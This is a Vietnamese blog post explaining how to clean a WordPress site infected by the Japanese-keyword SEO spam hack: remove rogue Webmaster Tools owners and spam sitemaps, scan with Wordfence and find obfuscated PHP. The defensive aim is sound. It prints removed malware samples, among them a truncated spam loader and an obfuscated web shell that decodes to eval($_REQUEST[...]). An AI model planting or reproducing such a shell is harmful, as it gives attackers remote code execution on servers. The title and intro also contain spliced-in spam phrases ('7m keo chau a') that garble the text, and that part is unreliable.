Cách fix lỗi site bị nhiễm mã độc và index tiếng Nhật_7m keo chau a

Mình biết phải tốn rất nhiều thời gian và công sức để SEO các từ khóa lên Top. Tuy nhiên,áchfixlỗisitebịnhiễmmãđộcvàindextiếngNhậ7m keo chau a khi các website khi không may bị dính mã độc sẽ khiến công sức các bạn gầy dựng bao lâu có thể tan thành mây khói chỉ trong vài ngày.

Bài viết sau đây sẽ hướng dẫn các bạn cách chi tiết cách fix lỗi site bị nhiễm mã độc và index tiếng Nhật. Mình sẽ không đi sâu vào lý do việc website bị hack.

Các website dùng WordPress thường là đối tượng bị dính mã độc khá nặng, khiến cho website tự động index link tiếng Nhật lên kết quả tìm kiếm Google, điển hình như sau:

1. Kiểm tra quyền truy cập WMT Webmaster Tool

Website bị nhiễm mã độc và index link tiếng Nhật sử dụng liên kết đến các cửa hàng bán hàng giả mạo và sau đó được hiển thị trong tìm kiếm của Google (Có thể kiểm tra những đường link này theo dạng site:domain). Với loại hack này, hacker thường sẽ tự thêm mình làm chủ sở hữu tài sản trong Google Webmaster Tool (WMT). Vì thế, bước đầu tiên bạn phải xóa quyền sở hữu của tài khoản lạ trong WMT

- Vào đường link sau https://www.google.com/webmasters/verification

- Vào "Chi tiết xác minh" để xem cách "tài khoản lạ" xác minh sở hữu website.

- Sau đó, vào CMS để xóa quyền sở hữu website này. (Trước khi bắt đầu, tạo một bản sao của bất kỳ tệp nào trước khi bạn xóa chúng, trong trường hợp bạn cần khôi phục chúng sau)
+ Mã thông báo xác minh cần xóa thường là tệp HTML trên thư mục gốc của trang web trên CMS.
+ Bạn thường có thể kiểm tra xem đã xoá thành công mã thông báo xác minh được tạo ra bằng cách điều hướng đến tệp token xác minh mô phỏng như thế nào www.example.com/google[random number and letters].html

Ví dụ: Website của mình có một mã xác minh: google-site-verification: google0003f30bc19bd379.html. Trên thanh URL gõ đường dẫn Domain/google0003f30bc19bd379.html. Nếu kết quả là 404 thì bạn đã xóa thành công tài khoản này

- Đi kèm với xác minh chủ sở hữu bằng tệp token, hacker cũng chèn vào một file Sitemapchứa các link độc hại để website index các link này nhanh hơn. Bạn cũng cần xóa file này đi

2. Download Plugin Wordfence Security về để quét toàn bộ site

Đây là cách rất nhanh để xác định các tập tin được hacker rải mã độc vào CMS. Đây là một plug-in về bảo mật miễn phí của WordPress . Sử dụng chức năng "scan" để quét các file. Sau đấy bạn dựa vào đó để sửa từng thư mục. Update các theme, phiên bản WordPress .

Các khối mã cần xóa:

Quét qua các tệp tin đáng ngờ mà bạn đã xác định để tìm các khối mã obfuscated. Mã obfuscated như một sự kết hợp của các chữ cái và chữ số sắp xếp lộn xộn thường được đặt trước bởi sự kết hợp của các hàm PHP như:

base64_decode, rot13, eval, strrev, gzinflate

Một số cấu trúc mình đã xóa:

<>
@set_time_limit(3600);
@ignore_user_abort(1);
$xmlname = 'mapss259.xml';
$jdir = '';
$smuri_tmp = smrequest_uri();
if($smuri_tmp==''){
$smuri_tmp='/';
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
if (isset($_SERVER['REQUEST_URI'])){
$smuri = $_SERVER['REQUEST_URI'];
}else{
if(isset($_SERVER['argv'])){
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
}else{
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
}
}
return $smuri;
}
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5....");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O....
?>

<>
/**
* @package wordpresss
* @subpackage Template.system
*
* @copyright Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
$p = getcwd();
echo $p;
?>

<>
$uf="aXRvbmd0b";
$ka="ZXZhbCgkX1";
$pjt="JFUVVFU1Rb";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice");
$iqw="25nXSk7";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp('', $bkf($vbl("W", "", $ka.$pjt.$uf.$iqw))); $mpy();
?>

Decode đoạn trên ra kết quả

最新评论